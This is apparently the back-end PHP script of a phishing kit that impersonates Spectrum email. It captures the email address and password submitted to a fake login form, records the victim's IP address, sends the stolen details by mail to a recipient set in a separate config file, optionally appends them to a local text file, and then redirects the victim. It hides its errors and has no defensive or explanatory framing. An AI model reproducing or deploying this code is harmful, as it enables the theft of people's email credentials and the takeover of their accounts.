<?php

ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(E_ALL);

$ip = getenv("REMOTE_ADDR");
include('jokconf.php');
#####################################################



$user = $_POST['emailAddress'];
$pass = $_POST['emailPassword'];


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
$message .= "--[Error Access Info ]--\n";
$message .= "Username    : ".$_POST['emailAddress']."\n";
$message .= "Password    : ".$_POST['emailPassword']."\n";
$message .= "IP: $ip\n";
$message .= "--Info --\n";
$subject = "Spectrum Email LOG - $ip";
$headers = "From: Spectrum <rzlt@mydomain.com>";

if ($saveintext=="yes") {
    $save = fopen("mrzz.txt", "a");
    fwrite($save, $message);
    fclose($save);
}

mail($recipient, $subject, $message, $headers);
header("Location: security"); 
